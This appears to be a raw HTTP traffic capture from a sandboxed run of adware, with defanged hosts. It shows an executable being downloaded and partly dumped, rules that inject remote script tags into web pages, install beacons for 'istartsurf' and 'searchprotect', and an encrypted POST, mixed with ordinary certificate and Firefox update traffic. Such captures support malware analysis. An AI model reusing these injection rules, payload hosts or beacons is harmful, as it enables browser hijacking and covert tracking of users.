-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Con
trol-Allow-Credentials: true..Accept-Ranges: bytes..</head>|<
script src="hXXps://VVV.njaxjs.me/services/script.js"></script&g
t;</head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/serv
ices/script.js" type="text/javascript"></script>.ncupons|nncu
pons.....


GET /services/update.php?v=1.2.0&key=RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0&dummy=744 HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:25 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia
..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-
Headers: X-Requested-With..Access-Control-Allow-Credentials: true..



POST /?v=1.03&c=04dec24f&at=620310157&cntr=0 HTTP/1.1
Accept: */*
Host: info.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 152
Cache-Control: no-cache

6l7GU7LYt04pVHc/00d7JpnsyIlcQScF0Zt4fhTcnqAudVVTHAkQvjbNdQcTQVWncSm617pM7dCpzGdczEzIc45kZsS9dv8pqDIWlb4QaSVK72mxtb2fZpL7YThHh9D3L7nkLApli1btouR P4d9XA==
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Length: 960
Connection: keep-alive
DNbcdwG83oyorjbtSlYTH1HSdlfAgwyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85b
sm99PmTeo3wq/jrGJIp2SJ8VAcn1FnN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tF
kQxxZqWjj62WXUjbeUqYzkgZZwa9griaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4
HW PfyGsb0FQJlcllJ2E/7Y6SGNzYmYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVG
NRIeyosQOrgGNifNkDwfljb1eY Upvhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zO
z4bCxXVBiLSw/i9yEOo4i2tRaDmV09Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx
40E9F0fSD/tbedMvJWTSYkO/TXb0sY3O7zhC8yQbJGORLjeg98mwuB1wGZCDc0Aj/F3Zev
9Vec7Xr5Hsf8aSuQ2bbZP  dKcxWjvFYPpexl8WtLO4UCI1EVzoWHYDm 1MOVn5taYtzqq
13oFvaK7vfUAGfmgYHuaf8nTzRS0IJa3NbpvROTAeUWpTusaRSIQGtT515hc4341dTvNLK
6u7VukLbxWVLKHIvMfZxubP/QYujEjiwf21K7 nZaEMEMpGlY6FmD5C63YKyNopqYXsse8
r30p4l/F dsOQQRPRKkPGO4y/BookvwEQiDzf1pe2q1nbgrTdPVb/lGdzLChzCkf gIGsN
68p2gY7EG49xG4YSAzyhVekJp1DlFbC7i pvbD1XZKMAVJkbtO0PcxgnPmBaC3le7ZevUc
f1huI2frYfKNL2h/8nZaenjFhjI26t DtNle9mPkB BhKGXLYoDm 2zRNxP/TAziyXOTC 
viDy83WtyHCQiBD/jtxSnF5f /GkNFn9wIpc1o6DVebDdHlMmEHTTP/1.1 200 OK..Acc
ess-Control-Allow-Origin: *..Date: Thu, 30 Apr 2015 23:07:06 GMT..Cont
ent-Length: 960..Connection: keep-alive..DNbcdwG83oyorjbtSlYTH1HSdlfAg
wyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85bsm99PmTeo3wq/jrGJIp2SJ8VAcn1F
nN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tFkQxxZqWjj62WXUjbeUqYzkgZZwa9g
riaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4HW PfyGsb0FQJlcllJ2E/7Y6SGNzY
mYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVGNRIeyosQOrgGNifNkDwfljb1eY Up
vhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zOz4bCxXVBiLSw/i9yEOo4i2tRaDmV0
9Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx40E9F0fSD/tbedMvJWTSYkO/T
<<< skipped >>>


HEAD /desprotetor_setup.exe HTTP/1.1
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:44
 GMT..Content-Type: application/octet-stream..Content-Length: 1117309.
.Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT..Connection: keep-alive.
.Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Reque
sted-With..CC: UA..Accept-Ranges: bytes......


GET /desprotetor_setup.exe HTTP/1.1


Range: bytes=0-1117308
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Range: bytes 0-1117308/1117309
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
.........H............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc...H............v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET /v4/searchprotect/535559167_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.95 ms","message":"store 4 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 201
5 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"1.95 ms","message":"store 4 act
ion and 0 update "}..0..



GET / HTTP/1.1
Host: VVV.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg
Content-Length: 259
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteD
NJmBgQg">here</A>...</BODY></HTML>..HTTP/1.1 302 
Found..Cache-Control: private..Content-Type: text/html; charset=UTF-8.
.Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg.
.Content-Length: 259..Date: Thu, 30 Apr 2015 23:07:20 GMT..Server: GFE
/2.0..Alternate-Protocol: 80:quic,p=1..<HTML><HEAD><met
a http-equiv="content-type" content="text/html;charset=utf-8">.<
TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>30
2 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.googl
e.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg">here</A>...&l
t;/BODY></HTML>....



GET /gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1474
Connection: keep-alive
Set-Cookie: __cfduid=d627dcfacd8ecab9edfc9af1368c6b67f1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 91499122d126a896a1d8c34863d5e7acd6de4b53
Expires: Fri, 01 May 2015 04:15:35 GMT
Last-Modified: Thu, 30 Apr 2015 16:15:35 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edc0de2e046d-FRA
0..........0..... .....0......0...0......,p... ...Gy.....'..B..2015043
0161535Z0u0s0K0... ........k..vY.d..X.R*.....C....n......>..t]..../
Pz...!..5..,.....}*..4....20150430161535Z....20150501041535Z0...*.H...
........`y._{V.....x%..v.t.w..[|....T..D>.2...)."..j.7...qpM..&V...
.4....,K..B.3.....!..v <#....F.J...j(@..o..6.e,...\..?7.......n..~.
..R...6.../"../&~F...4N4e..y<.<7.yu...{......r~...&....D....B..V
W.t4....-.........JI.a.FD...8..A\..li.....^......l.3;..v$n..l.E.M.....
0...0...0...........!~.(......gxK.2.T0...*.H........0Q1.0...U....BE1.0
...U....GlobalSign nv-sa1'0%..U....GlobalSign CodeSigning CA - G20...1
50303092326Z..150603082326Z0}1.0...U....BE1.0...U....GlobalSign nv-sa1
:08..U...1GlobalSign CodeSigning CA - G2 OCSP responder - 11.0...U....
201503031023000.."0...*.H.............0..............E..%p...1.._N.DD.
.y:\Q...........\.2!PFr...=.C-..dYY........e....yAy...U.HZ3.O....w&Z.:
.>.[......>.(..l..t.g3@X&..*i......i.u{...C.....B...........gj..
....s.!..~..].mS.#.,A @.......b...i.*G....2l.u.....<ISC....F......}
0....w2W..KC......6_.........Wua........0..0...U....0.0...U...........
0...U.%..0... .......0... .....0......0...U......,p... ...Gy.....'..B0
...U.#..0....n......>..t]..../Pz0...*.H.............y..6.-....H.~..
.H.....L..:G.....p...C..:.... /...5M.^}...5Q.~.....VC...Y.Z(I.k....P. 
s.!..b..,.A........~..y.G.H....N._......J.........|.k4..../...........
('.....)..:..t....-..}e&.*..:*8IH|2s::r..63..Y..G.....#.- ........N...
.R..X..@. j.,.........N.h........
<<< skipped >>>


GET /v4/sof-installer/535559167_198339_B48A115F?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.dlzip1.istartsurf.finish,5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<.
...........T..Z.....H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Da
te: Thu, 30 Apr 2015 23:07:15 GMT..Content-Type: text/html; charset=ut
f-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By:
 PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57............
.V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..
Z.....H.....0..



GET /pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar HTTP/1.1
Host: download.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Connection: keep-alive


HTTP/1.1 206 Partial Content
Last-Modified: Wed, 26 Nov 2014 16:59:55 GMT
ETag: "4b1e700-2dc5623-508c5f506dac8"
Server: Apache
X-Backend-Server: ftp3.dmz.scl3.mozilla.com
Content-Type: application/octet-stream
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
X-Cache-Info: cached
Cache-Control: max-age=255584
Expires: Sun, 03 May 2015 22:07:04 GMT
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Range: bytes 900000-1199999/47994403
Content-Length: 300000
Connection: keep-alive
d,.f.\s..H.vB9..b.I`.b..8%..g..m....x..*.....{....?..u;f....._nU._....
..y q....].~..N...=....c.:..wuz. g...O?....*-..U..,..]u.iE...9..s.gN..
5.A.v....;BK..H.....>.J..T.n.#. .......^:...9.giR..h.s..dX[:..D..3.
..I.`.5..pb.s.-..........P...M.3.,.Z.....t.&Z$nJ."o'.\..O.h.B,Y.......
W.........!<.eu.BWsJ.=...Z.l....~..l'...l..9l|....d.x....Fw.B.Gv8..
..2.XJ.Ed..r...V.J.%.$.~^..N..b.....!..w h-..3.......C[m......R.*/[email protected]
Jg..L.......t.#A....X......D.B.....w.d...$6....8.I....GP..e...o\.UJ.u.
.yX.I....c..<KG..T......L..mT..,7rA..g..".?....../.&...dI......&.. 
.k..p.....s..J\..J..p....!.1(...U...A=.......D.....{.H.....v..5!..w...
....&.s|......=...V...Ig..Dp..@k..*...o".......Q..r..l]u.u/...(.i.....
.(..j........1.g7..f._N..eVm..~...)%.hX0Zm............z.w...R.".^.hI.Q
..nZ@..|[email protected]..._.....(!$....gR..;O.$$#...w.{.k.hB.4.?.
....u.$...&}.......Od.. ....".......;[[email protected]$.n.[...B?n.....
.$.\%2........!S...l.(.k...:......c...h.f/...x..VZ..A..R*~....dHh.....
9...I.m [email protected]<...i.v./-.\-......d..~h..H. ..6.M
..0....Z.A.T....N..K @....j%....U:.^..z...~.I.....F"..J...`.......1F$.
..s.D......x$O6....;r.P./.es4.*......n.{g._.U..R?(......|.....B.......
m.N....p&.Z......*..ZQ..VR..[..8@".1xy.P..........z.n^.<....^...n3.
..1...'Ki../[email protected]..<.M$..2..|.v.n/6...V.
.......lE/......w8-........-R..\e...WA...756.H.]/d.....-......'.......
.. ..4J@.<.S.4....Fu6%...du.iP.....*>........%/..>#..}....._.
..c.b.f..!...D%L...../.......,...o&u...#..1...Ex.k.P.. .S.J/......
<<< skipped >>>


GET /services/rules.txt?dummy=100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:37 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:37 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="t
ext/javascript"></script></body>.ncupons|nncupons.HTTP/
1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:37 GMT..
Content-Type: text/plain..Content-Length: 111..Connection: keep-alive.
.Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT..ETag: "5ac277-6f-514f84
cc55900"..Cache-Control: max-age=600..Expires: Thu, 30 Apr 2015 23:17:
37 GMT..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Interme
dia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-All
ow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..
Accept-Ranges: bytes..</body>|<script src="//queryjs.me/servi
ces/script.js" type="text/javascript"></script></body>.
ncupons|nncupons...



GET /?product=firefox-34.0.5-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Cookie: optimizelySegments={"245617832":"none","245875585":"direct","245677587":"ff","246048108":"false","869421433":"true"}; optimizelyEndUserId=oeu1401956287616r0.2603029596469415; optimizelyBuckets={}; __utma=150903082.1617578787.1401956289.1401956289.1401956289.1
Connection: keep-alive


HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: bouncer2.webapp.scl3.mozilla.com
Cache-Control: max-age=60
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:15 GMT
Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar
Keep-Alive: timeout=3, max=499
Content-Length: 0
Connection: Keep-Alive
X-Cache-Info: cached
HTTP/1.1 302 Found..Server: Apache..X-Backend-Server: bouncer2.webapp.
scl3.mozilla.com..Cache-Control: max-age=60..Content-Type: text/html; 
charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:15 GMT..Location: hXXp://d
ownload.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US
/firefox-34.0.5.complete.mar..Keep-Alive: timeout=3, max=499..Content-
Length: 0..Connection: Keep-Alive..X-Cache-Info: cached..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=563288, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:40:21 GMT
Expires: Thu, 7 May 2015 11:40:21 GMT
Date: Thu, 30 Apr 2015 23:12:13 GMT
Connection: keep-alive
0..........0..... .....0......0...0......N$p...v....1.;..vn....2015043
0114021Z0s0q0I0... ...................F....0.yV......{&.K......&......
.c.. ..T.............20150430114021Z....20150507114021Z0...*.H........
.....>6K&Pfq...g.MF....Kp..>.-.3............Cpa.X...\...........
2..W.c=k6m>.z....SB.$[s..|#...;vO.6......'$.k.0...H.4.`...M....Iq..
.&...1....i..!..'.A4.l.H..... ...".p.r%'.r........,...Sa.b.0cx.Oh.7..Q
.......Uu.(^...q.9......bh...Q.".y..MO..1 ....s......\....P.....0...0.
..0............F...I]A([email protected]...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of us
e at hXXps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Cod
e Signing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.0..
.U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSi
gn Class 3 Code Signing 2010 OCSP Responder0.."0...*.H.............0..
.......q<...A...#......A...u..Lz.............o..D.vQ%..s.......f...
.e../jI.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.p..
..M/.. ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b..L.
..5.o..o..{..}.........%e.....N..._i........*Bc....:yQg.........0...0.
..U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.ve
risign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS in
corp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U
........0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.H..
............-..^.........f.P`...s.....8.....V.......... .... B.(@-
<<< skipped >>>


GET /install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com


HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 30 Apr 2015 23:07:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 668
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>404 Not Found</title></head>..&
lt;body bgcolor="white">..<h1>404 Not Found</h1>..<p
>The requested URL was not found on this server. Sorry for the inco
nvenience.<br/>..Please report this message and include the foll
owing information to us.<br/>..Thank you very much!</p>..&
lt;table>..<tr>..<td>URL:</td>..<td>hXXp://
log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&ui
d=535559167_198339_B48A115F</td>..</tr>..<tr>..<t
d>Server:</td>..<td>us-pub00.v9.com</td>..</tr
>..<tr>..<td>Date:</td>..<td>2015/04/30 18:
07:19</td>..</tr>..</table>..<hr/>Powered by T
engine/1.2.2..</body>..</html>..HTTP/1.1 404 Not Found..Se
rver: Tengine/1.2.2..Date: Thu, 30 Apr 2015 23:07:19 GMT..Content-Type
: text/html; charset=utf-8..Content-Length: 668..Connection: keep-aliv
e..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html&
gt;..<head><title>404 Not Found</title></head>
..<body bgcolor="white">..<h1>404 Not Found</h1>..&l
t;p>The requested URL was not found on this server. Sorry for the i
nconvenience.<br/>..Please report this message and include the f
ollowing information to us.<br/>..Thank you very much!</p>
..<table>..<tr>..<td>URL:</td>..<td>
<<< skipped >>>


GET /services/rules.txt?dummy=779 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:21 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="t
ext/javascript"></script></body>.ncupons|nncupons.t>....


GET /services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268 HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:22 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia
..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-
Headers: X-Requested-With..Access-Control-Allow-Credentials: true..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=479015, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 12:15:02 GMT
Expires: Wed, 6 May 2015 12:15:02 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..2015042
9121502Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
....^[email protected]...*.H........
.......d...W.P".....!..%.p..0....e."..<.\l&.. zl%ln@{.Sc.....l....;
R....@).(E.D...c.\.Q.L&...;]A$:.o1.(>.l..G#Db.!....bO..T=&}?.`.....
w.}1[.1.P.{[.%..Lji..`H...............Z...9M\\du8.X.N..c.A.:j$.p.2...0
.....7.2x....C"."...1(.LA6...&....SH,..../[email protected].....#0...0...0
..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use a
t hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code S
igning 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...
U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms o
f use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Clas
s 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.......
......m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...n
z(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*].
..*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...
:.C.Q.i~rl..<..krS..8.B..o][email protected]...
U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.veri
sign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS inco
rp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U..
......0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H
<<< skipped >>>


GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
